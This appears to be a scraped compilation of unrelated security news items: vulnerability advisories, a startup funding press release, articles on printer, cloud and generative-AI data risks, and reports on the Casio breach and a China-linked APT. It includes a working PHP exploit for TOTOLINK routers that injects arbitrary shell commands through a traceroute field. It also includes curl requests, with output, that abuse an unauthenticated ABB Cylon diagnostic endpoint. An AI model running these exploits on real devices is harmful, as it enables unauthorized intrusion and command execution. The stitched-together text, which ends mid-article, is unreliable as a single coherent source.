ABB Cylon Aspect version 3.08.01 allows an unauthenticated attacker to perform network operations such as ping, traceroute, or nslookup on arbitrary hosts or IPs by sending a crafted GET request to networkDiagAjax.php. This could be exploited to interact with or probe internal or external systems, leading to internal information disclosure and misuse of network resources.

    ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The vulnerability allows an unauthenticated attacker to perform networkoperations such as ping, traceroute, or nslookup on arbitrary hosts or IPs bysending a crafted GET request to networkDiagAjax.php. This could be exploitedto interact with or probe internal or external systems, leading to internalinformation disclosure and misuse of network resources.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5844Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5844.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=packetstormsecurity.org"<div>Server:    8.8.8.8<br>Address 1: 8.8.8.8 dns.google<br><br>Name:      packetstormsecurity.org<br>Address 1: 198.84.60.198 198-84-60-198.ash01.rokabear.com<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=ping&host=1.1.1.1"<div>PING 1.1.1.1 (1.1.1.1): 56 data bytes<br>64 bytes from 1.1.1.1: seq=0 ttl=53 time=61.176 ms<br>64 bytes from 1.1.1.1: seq=1 ttl=53 time=60.986 ms<br>64 bytes from 1.1.1.1: seq=2 ttl=53 time=100.660 ms<br><br>--- 1.1.1.1 ping statistics ---<br>3 packets transmitted, 3 packets received, 0% packet loss<br>round-trip min/avg/max = 60.986/74.274/100.660 ms<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=127.0.0.1"<div>traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets<br> 1  localhost.localdomain (127.0.0.1)  0.019 ms  0.010 ms  0.009 ms<br></div>

ABB Cylon Aspect 3.08.01 networkDiagAjax.php Remote Network Utility Execution

PRESS RELEASE

TEL AVIV, Israel, Oct. 15, 2024 /PRNewswire/ -- Port, the leading internal developer portal, announced today $35 million in Series B funding, bringing its total funding to $58M to date. The round was led by Accel, with participation from Bessemer Venture Partners and existing investors, including Team8 and TLV Partners. The highly oversubscribed round comes on the heels of Port's exceptional growth, with a 7x year-over-year increase in revenue. Port's user base has expanded eightfold since its Series A funding just one year ago, with customers including leading brands like LG, British Telecom and GitHub, which recently selected Port as the internal developer portal for their engineering team. Additionally, Port announced the integration of LLMs into its platform, enabling organizations to enhance their developer experience with generative AI.

Modern software development has evolved dramatically, with the responsibilities of developers expanding far beyond writing code. They are now responsible for the delivery process of features, managing cloud resources, handling incidents and outages, as well as complying with the organization's standards for security, quality, and compliance. This expanded responsibility, coupled with the intricacies of the modern development ecosystem, has created a chaotic situation where developers are constantly seeking guidance, creating tickets for tasks outside their core competencies, and relying heavily on tribal knowledge to navigate the landscape. This not only slows down development but also exacerbates quality, security, and compliance issues.

Port enables developers to handle the full scope of their expanded role by providing an internal developer portal that acts as a central work hub. The portal unifies all of the tools and workflows developers need to fully own the software development life cycle within an intuitive interface. The open platform is highly adaptable, integrating with the existing tech stack behind the scenes to create a standardized operating environment for R&D teams. The portal allows developers to perform complex tasks, like spinning up a new microservice, in just a few clicks with all best practices baked in. This approach not only enhances developer productivity but also ensures compliance with company policies.

"Development teams today are overwhelmed with responsibilities that extend far beyond writing code, leading to operational chaos and a degradation of standards," said Zohar Einy, co-founder and CEO of Port. "Our mission is to empower teams to start left, ensuring that everything is secure, compliant, and high-quality by design. Port provides a dynamic, customizable platform that fits into each company's DNA and evolves with their needs, enabling all stakeholders — from developers to security teams to leadership — to collaborate effectively and maintain organizational standards. Port empowers teams to be self-sufficient owners of the software they develop, restoring agility and driving significant business impact."

Port is also announcing the integration of popular LLMs with its platform, allowing organizations to embed AI capabilities directly into their customized developer portals. The open nature of Port's platform enables each organization to leverage AI models according to their needs. Popular uses include: investigating incidents using natural language search to quickly find root causes and relevant experts, automatically generating clear error messages from failed build logs, and recommending internal libraries and components to developers based on the feature or service they're currently working on.

"We see the internal developer portal market as the next big must have in software development, with the potential to rival the impact of APM or Git providers," said Matt Robinson, Partner at Accel. "Port has emerged as the #1 product in this space due to the platform being highly customizable while also maintaining agility and ease of use. Zohar and Yonatan's dev-first approach sets them apart and their exceptional growth speaks volumes about the team's product execution and market fit."

"Over the past decade, organizations have invested heavily in DevOps, automating processes and adopting best practices to drive agility," said Amit Karp, Partner at Bessemer Venture Partners. "However, they haven't reaped the full benefits due to the increased complexities introduced. Port has experienced a meteoric rise because it arrived at a key moment, serving as the missing piece that completes the DevOps puzzle. Customizable internal developer portals enable organizations to finally unlock the true promise of DevOps — improved DORA metrics, streamlined workflows, enhanced agility, adherence to standards, and empowered developers."

About Port 

Port is the leading platform for creating internal developer portals, empowering all stakeholders in the software development lifecycle. Founded in 2022 by Zohar Einy and Yonatan Boguslavski, it emerged from the founders' experience building an internal developer portal for Israel's elite 8200 intelligence unit, which served over 2,000 developers. Now with 100 employees and tens of thousands of users, Port has rapidly become the de facto standard in the market, providing a central hub that unifies tools, knowledge, and workflows for developers, security teams, and leadership alike. The platform's customizable interface enables seamless collaboration and ensures compliance with organizational standards, from setting up microservices to managing cloud resources and handling incidents. Port's open platform integrates with existing tech stacks and incorporates AI capabilities, adapting to each company's unique DNA. By streamlining processes and enhancing visibility, Port drives significant business impact, improves DORA metrics, and unlocks the true promise of DevOps for companies of all sizes. To learn more about Port's internal developer portal platform, visit getport.io.

Port Raises $35M for its End-to-End Internal Developer Portal

The shift to a distributed work model has exposed organizations to new threats, and a low but continuing stream of printer-related vulnerabilities isn't helping.

Source: Magnetic Mcc via Shutterstock

The shift to hybrid work models has exposed new vulnerabilities in corporate print infrastructure and heightened security risks at many organizations.

The risks run the gamut and include employees using insecure and unmanaged printers, remote workers sending print jobs over public networks, inadequate user authentication and print job release processes, exposed local spools and caches, and inconsistent patching practices.

A relatively low but steady volume of print-related vulnerabilities have exacerbated these issues. Recent examples of such vulnerabilities include CVE-2024-38199 (a remote code execution \[RCE\] vulnerability in the Windows or Line Printer Daemon \[LPD\] Service), CVE-2024-21433 (a Windows Print Spooler elevation of privilege vulnerability), and CVE-2024-43529 (a similar vulnerability that Microsoft disclosed in its October security update). The threats are certainly not Windows-specific, either. Recently, researchers discovered a set of potentially severe flaws in Common Unix Printing System (CUPS), a legacy protocol largely used in Linux, Unix, and heterogeneous environments.

Though few of these flaws have presented as major a threat as the PrintNightmare RCE flaw from 2021 in the Windows Print Spooler service, they have complicated the challenge of managing modern print infrastructure. Attackers, including nation-state actors, have sometimes abused printer software vulnerabilities — like CVE-2022-38028 — to substantial effect in their campaigns.

**Increase in Printer-Related Breaches**

The trends have driven an increase in print-related data breaches. A recent study that Quocirca conducted found that 67% of respondents experienced a printer-related security incident in 2024, compared with 61% last year. Small and mid-market organizations fared worse, with three-quarters (74%) reporting a printer-related data loss incident. Thirty-three percent pointed to unmanaged, employee-owned printers as a major security concern, and 29% identified vulnerabilities in office printing environments as presenting a major risk. More than a quarter (28%) identified their biggest printer related security challenge as protecting sensitive and confidential information.

Casey Ellis, founder and chief strategy officer at Bugcrowd, says the takeaway for organizations is that print security needs to be priority for decision makers. "Printer and print servers are an excellent place to establish persistence and gain business intelligence on a target," he says. The CUPS vulnerabilities showed that old, unused printer software can still represent a significant attack surface, especially for internal attacks and lateral movement.

Unfortunately, many organizations might be underestimating the risks or overlooking them altogether. And the shift to cloud/hybrid print environments have made printer infrastructure even more of an invisible issue from a vulnerability management standpoint, Ellis notes. "Let’s be real — the list of people who spend their days thinking about or even interacting with printers is a pretty small one," he says. "If your vulnerability management process allows out-of-sight, out-of-mind to dictate priority, it’s easy to miss \[printer security risks\]," he says.

The main takeaway is a general one, Ellis says: "Organizations need to remain diligent about their asset inventory and overall attack surface and ensure that they have a process for evaluating the risk."

**Printers, an Underestimated Risk?**

The legacy nature of many printer service environments is another issue, because vulnerabilities can sometimes exist undetected on them for years. Often, these printer environments lack the kind of monitoring tools that are available on other endpoint systems, making them a big target for attackers.

Often flaws are introduced into organizations' print infrastructure because print services are on by default and administrators are not aware of this, says Tom Boyer, director of security at Automox. "This means that this risk will go unseen for years and adversaries use that to their advantage," he notes. "They often know more about the target environment than the company themselves."

The Quocirca survey found security to be the top barrier to adoption of cloud print services as well.

"Although many organizations believe the cloud is more secure than an on-premise environment, security concerns remain a critical barrier to cloud print adoption," says Nicole Heinsler, chief engineer of security and device management at Xerox. "Overall, there is a disconnect between providers and clients on how the cloud can improve security by managing zero-day threats more effectively, and how data sovereignty can be more easily managed through cloud policies."

**Cloud Printing Cyber-Risks**

The survey found that many organizations view resting data — such as print jobs waiting in a queue and documents uploaded to the cloud print service — as a primary risk, Heinsler says: "This is why incorporating zero-trust principles in your cloud print infrastructure, such as authentication and access control, monitoring, detection, remediation, data and document protection, encryption, and automation, is so imperative."

One way to centralize print management infrastructure is to use cloud print options that deploy a native cloud architecture, rather than to attempt a "lift-and-shift" of traditional on-premises server architecture to a private cloud, she notes. The challenges organizations face will depend on the level of customization their applications have.

"For example, if they use standard print protocols, there's often little issue with \[cloud\] integration," Heinsler says. "\[But\] specific applications should be subjected to proof of concept before full enterprise deployment."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Hybrid Work Exposes New Vulnerabilities in Print Security

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.totolink.net/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {  
    private $targetUri;  
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {  
        $this->targetUri = $targetUri;  
        $this->sleepTime = $sleepTime;  
    }

    // Function to send POST request and execute the command on the target  
    public function executeCommand($cmd) {  
        $num = rand(1, 500);  
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
        $data = json_encode([  
            "command" => "127.0.0.1; {$cmd};#",  
            "num" => $num,  
            "topicurl" => "setTracerouteCfg"  
        ]);

        // Send POST request  
        return $this->sendPostRequest($url, $data);  
    }

    // Check if the target is vulnerable  
    public function check() {  
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable  
        $response = $this->executeCommand("echo test");  
        if (!$response || strpos($response, 'success') === false) {  
            return "Target is likely not vulnerable.\n";  
        }

        // Test command injection using sleep  
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
        $start = microtime(true);  
        $this->executeCommand("sleep {$this->sleepTime}");  
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
        if ($elapsedTime >= $this->sleepTime) {  
            return "Target is vulnerable: Blind command injection successful.\n";  
        }

        return "Command injection test failed.\n";  
    }

    // Exploit the vulnerability to run the payload  
    public function exploit($payload) {  
        echo "Executing payload on the target.\n";  
        $this->executeCommand($payload);  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => $postFields  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TOTOLINK 9.x Command Injection

Snipe-IT before 7.0.10 allows remote code execution (associated with cookie serialization) when an attacker knows the APP_KEY. This is exacerbated by .env files, available from the product's repository, that have default APP_KEY values.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-57qh-vmjr-5jxg: Snipe-IT remote code execution

Casio experienced a major cyberattack on October 5, 2024, causing system disruptions and raising concerns about a potential…

Casio experienced a major cyberattack on October 5, 2024, causing system disruptions and raising concerns about a potential data breach. The company is investigating the incident with cybersecurity experts.

Casio, the iconic Japanese electronics company, is in the spotlight again due to another cybersecurity breach. On October 5, 2024, **Casio** experienced a major cyberattack involving unauthorized access to its network, resulting in system-wide disruptions.

Although the company is still investigating whether attackers compromised sensitive data in the October 2024 incident, this comes on the heels of a significant data breach **in October 2023**, caused by human error. That breach affected users in 148 countries and targeted Casio’s ClassPad education platform, which is widely used by students and educators.

****The October 2024 Breach: What Happened?****

According to Casio’s **security advisory** published in Japanese, on October 5, 2024, an unidentified third-party actor gained unauthorized access to the company’s network triggering outages and temporarily disrupting several of the company’s services.

Casio has not yet revealed which specific services were impacted. The network breach is under investigation, and the company is working closely with cybersecurity experts to determine the full extent of the damage.

Casio released a statement acknowledging the breach and its potential impact, stating, “We deeply apologize for any concern and inconvenience this may cause to our customers and partners.” The company has restricted external access to its systems while the investigation is ongoing.

****Data Breach Concerns****

One of the concerns following the October 2024 cyberattack is whether any sensitive data, such as customer information or business-critical data, was compromised. As of now, no ransomware group has taken responsibility for the attack, despite the systemic disruptions that are typical in ransomware attacks.

Hackread.com is closely monitoring the situation, and this article will be updated as soon as Casio releases new information. Stay tuned for further developments!

1.  **Casio China Hacked, 150,000 user accounts leaked**
2.  **Casio Electronics Taiwan Website Hacked by SaMuRai Hacker**
3.  **Dell Discloses Data Breach As Hacker Sells 49M Customer Data**
4.  **Lesson from Casio’s Data Breach: Database Security Challenges**
5.  **Acer Data Breach: Hacker Claims to Sell 160GB Trove of Stolen Data**

Casio Hit by Major Cyberattack AGAIN

Businesses that successfully manage the complexities of multicloud management will be best positioned to thrive in an increasingly digital and interconnected world.

Source: John Williams RF via Alamy Stock Photo

COMMENTARY

Improper cloud security has cost organizations millions — sometimes even billions — in revenue in the past decade alone. A significant example is Japanese automaker Toyota, which suffered a data breach due to cloud misconfiguration, exposing the personal data of more than 2 million customers. Another example is Accenture, which in August 2021 fell victim to the LockBit ransomware group. Due to cloud misconfigurations, hackers gained access to and stole 6TB of proprietary client data, demanding a ransom of $50 million. These incidents highlight the catastrophic impact that cloud security failures can have. 

As organizations increasingly adopt multicloud strategies, managing multiple cloud environments can lead to cloud misconfigurations and improper handling of cloud resources. Each cloud provider offers different tools, settings, and protocols, making it challenging to ensure consistent security configurations across all platforms. These misconfigurations often are the root cause of significant security breaches, as seen in the examples above. The lack of visibility and control over multiple clouds exacerbates these risks, making it imperative for organizations to adopt robust cloud security practices.

The shift to multicloud environments offers enhanced reliability, reduced vendor lock-in risks, and greater business capabilities. However, this transition is fraught with complexities that require careful planning and strategic management to ensure success. Let's look at the critical aspects of managing multicloud environments, focusing on governance, security, and operational challenges. 

**Evolution and Risks of Multicloud Environments**

The cloud landscape has evolved from traditional on-premises virtualization to a complex array of cloud platforms operating simultaneously. This shift has introduced significant security challenges for enterprises. One of the primary drivers for adopting a multicloud strategy is the need to mitigate risks such as: 

*   Security vulnerabilities/zero-days 
    

However, these benefits come with inherent risks. Organizations must navigate the challenges of the following: 

*   Shared security controls: Implementing consistent security measures across different platforms can be challenging. 
    

*   Governance across multiple platforms: Ensuring compliance with various regulatory requirements can be complex. 
    

*   Varying compatibility: Third-party tools and services may not be compatible across all cloud environments. 
    

For example, companies that previously operated in a single cloud environment must now contend with the complexities of integrating and securing multiple cloud platforms, each with its own unique set of tools and protocols. The lack of coordination and governance in operations and deployments can lead to increased vulnerabilities and operational inefficiencies. Moreover, the scarcity of skilled professionals proficient in multiple cloud platforms exacerbates these challenges, making it crucial for organizations to invest in cross-functional training and development. 

**The Strategic Imperative of Governance and Security**

Effective governance is at the heart of a successful multicloud strategy. Organizations must establish clear guidelines and policies to manage the complexities of multiple cloud environments. Key governance aspects include: 

*   Defining roles and responsibilities: Clarifying who is responsible for cloud administration and security across different platforms. 
    

*   Deploying consistent security controls: Ensuring that security measures are uniformly applied across all cloud environments. 
    

*   Ensuring regulatory compliance: Meeting compliance requirements in each cloud environment.  
    

Security in a multicloud environment is particularly challenging, due to the expanded attack surface and the need for consistent security measures across different cloud platforms. A key aspect of managing security is the centralization of security operations. Centralizing the deployment of images and infrastructure-as-code (IaC) is essential for maintaining a secure and consistent cloud environment. For instance: 

*   Standardizing configurations: Establishing uniform configurations across all cloud environments to minimize the risk of security breaches. 
    

*   Automating security controls: Implementing automated security checks to reduce the likelihood of human error. 
    

Cloud security posture management (CSPM) tools play a critical role in this process. These tools enhance visibility across multiple cloud environments by providing a unified view of security risks. CSPM tools help organizations identify and prioritize risk mitigations according to their business requirements, ensuring that the most critical vulnerabilities are addressed promptly. By consolidating security data from various clouds into a single dashboard, these tools offer a comprehensive picture of the organization's security posture, enabling more effective decision-making. 

CSPM tools like Wiz, Orca, and Lacework go beyond basic security monitoring. They provide continuous assessment of cloud infrastructure, detect misconfigurations, and monitor compliance against frameworks such as CIS, PCI, NIST, and HIPAA. These tools also offer automation features, which can streamline incident response processes by automatically remediating identified risks or alerting security teams for further investigation. 

For instance, in my experience, Wiz and Orca have been particularly effective in identifying and mitigating risks in multicloud environments. These tools not only help prioritize the mitigation of various security risks but also provide structured guidance based on widely accepted baselines. Similarly, Lacework offers robust capabilities in anomaly detection, allowing organizations to identify unusual behaviors that may indicate security breaches or misconfigurations. 

**Taking Multicloud Management to the Finish Line**

Managing a multicloud environment requires a strategic approach that prioritizes governance, security, and centralization. Organizations must develop comprehensive strategies that align with their specific needs and invest in the necessary tools and skills to navigate the complexities of multicloud environments successfully. Understanding which offerings are unique to each cloud service provider allows organizations to leverage the strengths of different platforms effectively. Building a consistent monitoring capability across clouds is essential to maintain visibility and control over the entire infrastructure. 

The use of third-party tools suited for multicloud environments can enhance security and operational efficiency. Applying a framework with consistent policies and controls ensures that security standards are uniformly enforced across all cloud environments. Additionally, implementing a single identity system across clouds simplifies identity and access management, reducing the risk of unauthorized access and improving overall security posture. 

CSPM tools are essential components of this strategy, offering enhanced visibility and control across multiple cloud platforms. These tools provide a single, comprehensive view of the organization's security posture, enabling more informed decision-making and more effective risk management. As businesses continue to embrace the multicloud paradigm, those that successfully manage these complexities will be better positioned to thrive in an increasingly digital and interconnected world. 

**About the Author**

Information Security Officer, IMC Trading

Jatin Mannepalli, CISSP, CCSP is an information security officer (ISO) at IMC Trading, where he brings a deep commitment to managing security and risk across organizations. With more than 10 years of experience in the InfoSec space, he has built and led information security and risk management teams, and has also worked as a security consultant for major consulting firms like McKinsey & Company. Jatin is passionate about security governance and risk management, as well as developing technology-driven, customer-focused strategies that prioritize both organizational success and client satisfaction. Known for his holistic approach, he is dedicated to fostering a culture of security that aligns with the organization’s broader goals. In addition to his professional accomplishments, Jatin is recognized as one of the top voices in Information Security on LinkedIn. In his leisure time, he volunteers to promote security awareness in local communities and contributes to the cybersecurity community by helping develop exams for ISC2.

Navigating the Complexities &amp; Security Risks of Multicloud Management

CeranaKeeper is bombarding Southeast Asia with data exfiltration attacks via file-sharing services such as Pastebin, OneDrive, and GitHub, researchers say.

Source: Antonio Gill via Alamy Stock Photo

An emergent China-aligned threat actor called CeranaKeeper has orchestrated a massive data exfiltration effort across Southeast Asia, most recently launching a barrage of cyberattacks against government institutions of Thailand.

The group has been working since early 2022, according to ESET researchers. Analysis showed CeranaKeeper was using components common with the known Chinese-backed APT group Mustang Panda, in addition to fresh tools for undermining legitimate file-sharing services, including Pastebin, Dropbox, OneDrive, and GitHub.

"Based on our findings, we decided to track this activity cluster as the work of a separate threat actor," a new ESET report said. "The numerous occurrences of the string \[Bb\]ectrl in the code of the group's tools inspired us to name it CeranaKeeper; it is a wordplay between the words beekeeper and the bee species Apis Cerana, or the Asian honey bee."

CeranaKeeper broke into Thai government systems through a brute-force attack against a local area network domain control server in mid-2023, ESET said. From there the group was able to get privileged access, deploy the Toneshell backdoor and a credential dumping tool, and also abuse a legitimate Avast driver to disable security protections.

Once comfortably in the network, the group began a massive data harvesting effort, ESET observed.

The group is "relentless," rapidly evolving, and nimble, ESET warned.

"The operators write and rewrite their toolset as needed by their operations and react rather quickly to keep avoiding detection," ESET added. "This group's goal is to harvest as many files as possible and it develops specific components to that end."

The Chinese government uses APT groups like Mustang Panda and CeranaKeeper to support government activities through espionage and other cybercrimes.

China-Backed APT Group Culling Thai Government Data

Productivity has a downside: A shocking number of employees share sensitive or proprietary data with the generational AI platforms they use, without letting their bosses know.

Source: Marcos Alvarado via Alamy Stock Photo

Generational AI chatbots are popping up in everything from email clients to HR tools these days, offering a friendly and smooth path toward better enterprise productivity. But there's a problem: All too often, workers aren't thinking about the data security of the prompts they're using to elicit chatbot responses.

In fact, more than a third (38%) of employees share sensitive work information with AI tools without their employer's permission, according to a survey this week by the US National Cybersecurity Alliance (NCA). And that's a problem.

The NCA survey (which polled 7,000 people globally) found that Gen Z and millennial workers are more likely to share sensitive work information without getting permission: A full 46% and 43%, respectively, admitted to the practice, as opposed to 26% and 14% of Gen X and baby boomers, respectively.

**Real-World Consequences From Sharing Data With Chatbots**

The issue is that most of the most prevalent chatbots capture whatever information users put into prompts, which could be things like proprietary earnings data, top-secret design plans, sensitive emails, customer data, and more — and send it back to the large language models (LLMs), where it's used to train the next generation of GenAI.

And that means that someone could later access that data using the right prompts, because it's part of the retrievable data lake now. Or, perhaps the data is kept for internal LLM use, but its storage isn't set up properly. The dangers of this — as Samsung found out in one high-profile incident — are relatively well understood by security pros — but by everyday workers, not so much.

ChatGPT’s creator, OpenAI, warns in its user guide, "We are not able to delete specific prompts from your history. Please don't share any sensitive information in your conversations." But it's hard for the average worker to constantly be thinking about data exposure. Lisa Plaggemier, executive director of NCA, notes one case that illustrates how the risk can easily translate into real-world attacks.

"A financial services firm integrated a GenAI chatbot to assist with customer inquiries," Plaggemier tells Dark Reading. "Employees inadvertently input client financial information for context, which the chatbot then stored in an unsecured manner. This not only led to a significant data breach, but also enabled attackers to access sensitive client information, demonstrating how easily confidential data can be compromised through the improper use of these tools."

Galit Lubetzky Sharon, CEO at Wing, offers another real-life example (without naming names).

"An employee, for whom English was a second language, at a multinational company, took an assignment working in the US," she says. "In order to improve his written communications with his US based colleagues, he innocently started using Grammarly to improve his written communications. Not knowing that the application was allowed to train on the employee's data, the employee sometimes used Grammarly to improve communications around confidential and proprietary data. There was no malicious intent, but this scenario highlights the hidden risks of AI."

**A Lack of Training & the Rise of "Shadow AI"**

One reason for the high percentages of people willing to roll the dice is almost certainly a lack of training. While the Samsungs of the world might swoop into action on locking down AI use, the NCA survey found that 52% of employed participants have not yet received any training on safe AI use, while just 45% of the respondents who actively use AI have.

